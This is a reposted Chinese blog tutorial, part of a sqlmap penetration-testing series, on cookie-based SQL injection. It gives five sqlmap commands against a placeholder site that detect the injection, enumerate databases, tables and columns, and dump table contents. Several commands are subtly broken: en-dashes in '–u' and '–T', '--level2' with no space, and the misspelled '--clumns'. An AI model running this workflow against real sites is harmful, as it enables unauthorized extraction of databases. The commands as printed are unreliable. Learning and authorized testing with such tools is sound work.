SQLmap系列—4、Cookie注入
文章来源:FLy_鹏程万里
版权声明:本文为CSDN博主「FLy_鹏程万里」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
https://blog.csdn.net/Fly_hps/java/article/details/80198522
说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!
1、判断是否可以注入
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --level 2
2、猜解数据库
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --dbs --level 2
3、猜解表
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --tables --level2
4、猜解字段
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 –T 表名 --clumns --level2
5、猜解内容
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 –T 表名 -C 字段名 --dump --level2
往期精选
*Kali linux渗透测试系列—3、 Kali Linux渗透测试环境搭建之Kali linux基本配置
*Kali linux渗透测试系列—2、 Kali Linux渗透测试环境搭建之Kali Linux中Vmtools的安装
*Kali linux渗透测试系列—1、Kali linux渗透测试环境搭建之Kali Linux环境搭建